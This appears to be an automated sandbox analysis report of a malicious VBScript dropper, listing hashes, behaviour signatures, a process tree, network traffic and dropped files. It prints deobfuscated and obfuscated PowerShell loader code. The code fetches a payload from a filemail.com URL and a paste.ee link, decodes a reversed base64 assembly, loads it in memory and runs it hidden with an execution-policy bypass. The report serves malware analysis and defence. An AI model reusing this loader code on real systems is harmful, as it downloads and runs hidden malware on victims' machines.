Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    12/11/2024, 02:30 UTC

General

  • Target

    76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2.vbs

  • Size

    12KB

  • MD5

    8a330624d5189d9bcd491d93c29624c4

  • SHA1

    b89dd3334cd355360ae7e6f85a060dbe4de9d01d

  • SHA256

    76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2

  • SHA512

    9af32c229db64bb133a39e7e3ec12dd269d971734fe2e46c61c0167696d6dc43c7ad274e7cbbcb0c41ac529a3ccdbb2a6e04ee1807cdfbe1dd3af11462016685

  • SSDEEP

    96:khBZNNgct8LOgrf8x/JIcBkiYM1z9jRFtRQLNkOAhqL5s7n1muCweU:YBZNUOgrf6/JIcBkiYM1zbuLi7Aub

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
# powershell snippet 0
invoke-expression "$imageUrl = 'https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f ';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$base64Reversed = -join ($base64Command.ToCharArray() | ForEach-Object { $_ })[-1..-($base64Command.Length)];$commandBytes = [System.Convert]::FromBase64String($base64Reversed);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.dstep/pop/ue.prgxamygrene.gig//:ptth', 'desativado', 'desativado', 'desativado', 'desativado', '1', 'colorcpl', 'desativado', 'desativado','desativado','desativado','desativado','1','desativado'));"

# powershell snippet 1
$imageurl = "https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f "
$webclient = new-object system.net.webclient
$imagebytes = $webclient.downloaddata("https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f ")
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
$startflag = "<<BASE64_START>>"
$endflag = "<<BASE64_END>>"
$startindex = $imagetext.indexof("<<BASE64_START>>")
$endindex = $imagetext.indexof("<<BASE64_END>>")
$startindex -ge 0 -and $endindex -gt $startindex
$startindex = $startflag.length
$base64length = $endindex - $startindex
$base64command = $imagetext.substring($startindex, $base64length)
$base64reversed = -join $base64command.tochararray()|%{$_}[-(1..)($base64command.length)]
$commandbytes = [system.convert]::frombase64string($base64reversed)
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
$vaimethod = ([dnlib.io.home]).getmethod("VAI")

URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\emksjAafCReiQSFZxSk.vbs"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sheLLID[1]+$shELLID[13]+'X') (('WEwimageUrl = ToRhttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStG'+'rnTICfFhmTKj3LC6SQtIcOc_T35w&pk_v'+'id=fd4f614bb209c62c1730945176a090'+'4f ToR;WEwwebClient = New-Object System.Net.WebC'+'lient;WEwimageBytes = WEwwebClient'+'.DownloadData(WEwimageUrl);WEwimageText = [System.Text.Encoding]::UTF8'+'.'+'GetString(WEwimageBytes);WEwstartFlag ='+' ToR<'+'<BASE64_START>>ToR;WEwendFlag = ToR<<BASE64_END>>ToR;WEwstartInd'+'ex'+' = WEwi'+'mageText.In'+'dexOf(WEwstartFlag);WEw'+'e'+'ndIndex = WEwimageText.IndexOf(WEwendFlag);WEwstartIndex -ge 0 -and WEwendIndex -gt WEwstartIndex;WEwstartIndex += WEwstartFlag.Length;WEwb'+'ase64Le'+'ngth = WEwendIndex - WEwstartIndex;WEwbase64Command'+' = WEwimageTex'+'t.'+'Substring(WEwstartIndex, WEwbase64Length);WEwbase64Re'+'versed = -join '+'(WEwbase64Command.ToCharArray() tdw ForEach-Object { WEw_ })[-1..-(WEwbase64Command.Length)]'+';WEwcommandBytes = [System.Convert]::FromBase64'+'String(WEwbase64Reversed);WEwloaded'+'A'+'ssembly'+' = [S'+'ystem.Reflection.Assembly]::Loa'+'d(WEwcommandByt'+'es);WEwvaiMethod = [dnlib.IO.Home].GetMethod(ToRVAIToR);WEwvaiMethod.Invoke(WEwnull, @(ToRtxt.dstep/pop/ue.prgxamygrene.gig//:ptthToR, ToRdesativad'+'oToR, '+'ToRdesativado'+'ToR, ToRdesativadoToR, ToRdesati'+'vadoT'+'oR, ToR1ToR, ToRcolorcplToR, ToRd'+'esativadoToR, ToRdesativadoToR,ToRde'+'sativadoToR,ToRdesativadoToR,ToRdesativadoToR,ToR1ToR,ToRdesa'+'tivadoToR)'+');').RePlace('tdw',[STrIng][CHAR]124).RePlace('ToR',[STrIng][CHAR]39).RePlace('WEw',[STrIng][CHAR]36) )"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2604

Network

  • DNS
    paste.ee
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    paste.ee
    IN A
    Response
    paste.ee
    IN A
    172.67.187.200
    paste.ee
    IN A
    104.21.84.67
  • GET
    http://paste.ee/d/VTRKt
    WScript.exe
    Remote address:
    172.67.187.200:80
    Request
    GET /d/VTRKt HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Tue, 12 Nov 2024 02:31:00 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Location: https://paste.ee/d/VTRKt
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2F1I9sG7v9kTqnIEYNSQe3SpIFSl2%2FipDgPr73sJEs%2FngUqSqRNX9K7oUl9gBa%2FuxVYqxdbgIzBbXA218YiOifmO3Mocjt1qmmJYFD0n%2BQ1pYw%2FK%2FBs6Zb003A%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e131a70eabed1fd-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=41193&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=173&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • GET
    https://paste.ee/d/VTRKt
    WScript.exe
    Remote address:
    172.67.187.200:443
    Request
    GET /d/VTRKt HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
    Response
    HTTP/1.1 200 OK
    Date: Tue, 12 Nov 2024 02:31:01 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=2592000
    strict-transport-security: max-age=63072000
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fk4SYyS%2FRu5nHv7Zp3EIQYwYvPcIq5t1gUfhM3AK70Y88gkSJjjX8B8QjlUHifMXhl%2B1XqFHGO%2F%2F8ON0lrRTk8QK%2Bg18mby3lVr2r34CXFJFtBPjdY6HRPjuFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e131a73cf793864-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=44472&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=459&delivery_rate=86561&cwnd=253&unsent_bytes=0&cid=f68edf414fb37d79&ts=685&x=0"
  • DNS
    1017.filemail.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    1017.filemail.com
    IN A
    Response
    1017.filemail.com
    IN CNAME
    ip.1017.filemail.com
    ip.1017.filemail.com
    IN A
    142.215.209.78
  • 172.67.187.200:80
    http://paste.ee/d/VTRKt
    http
    WScript.exe
    403 B
    1.2kB
    5
    4

    HTTP Request

    GET http://paste.ee/d/VTRKt

    HTTP Response

    301
  • 172.67.187.200:443
    https://paste.ee/d/VTRKt
    tls, http
    WScript.exe
    3.8kB
    151.9kB
    72
    134

    HTTP Request

    GET https://paste.ee/d/VTRKt

    HTTP Response

    200
  • 142.215.209.78:443
    1017.filemail.com
    tls
    powershell.exe
    259 B
    92 B
    3
    2
  • 142.215.209.78:443
    1017.filemail.com
    tls
    powershell.exe
    259 B
    92 B
    3
    2
  • 8.8.8.8:53
    paste.ee
    dns
    WScript.exe
    54 B
    86 B
    1
    1

    DNS Request

    paste.ee

    DNS Response

    172.67.187.200
    104.21.84.67

  • 8.8.8.8:53
    1017.filemail.com
    dns
    powershell.exe
    63 B
    96 B
    1
    1

    DNS Request

    1017.filemail.com

    DNS Response

    142.215.209.78

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    ed91ecadd86067a6f3e03819d160c6b8

    SHA1

    43d8fb130f57b3c779d93dbb7d02037082017e83

    SHA256

    8dac40eb7f16bb0a3e52fda1072fe1767a016b69bae1c5948942411473bebbc0

    SHA512

    71768eb0bcb0301ef3d983c339ec0f3ac72c82d70487da6d2fa20c9c76d45bf1acf990feb1f026fe0d77720cb8de14bb68121b58138bd1b42f5eaeb0b844c0e1

  • C:\Users\Admin\AppData\Roaming\emksjAafCReiQSFZxSk.vbs

    Filesize

    1KB

    MD5

    c1ab9e3c7a5a70259e486e1b35e791dd

    SHA1

    f0f6ebff9ebfac13bf995bccf8193daf58827652

    SHA256

    6cc7e3be7d1abd44b8cd67b15cbc5c86ee366edc63da01e0b1b7544982551738

    SHA512

    9d705558cd936e603ae1db6860fa1f2a7337acf8df787ca1acb9a32c96d0345834b705aac1c503215127fefe01057bd789be276cc2a377dc29c856e0b78fd9d2

  • memory/2748-8-0x000000001B6A0000-0x000000001B982000-memory.dmp

    Filesize

    2.9MB

  • memory/2748-9-0x00000000020F0000-0x00000000020F8000-memory.dmp

    Filesize

    32KB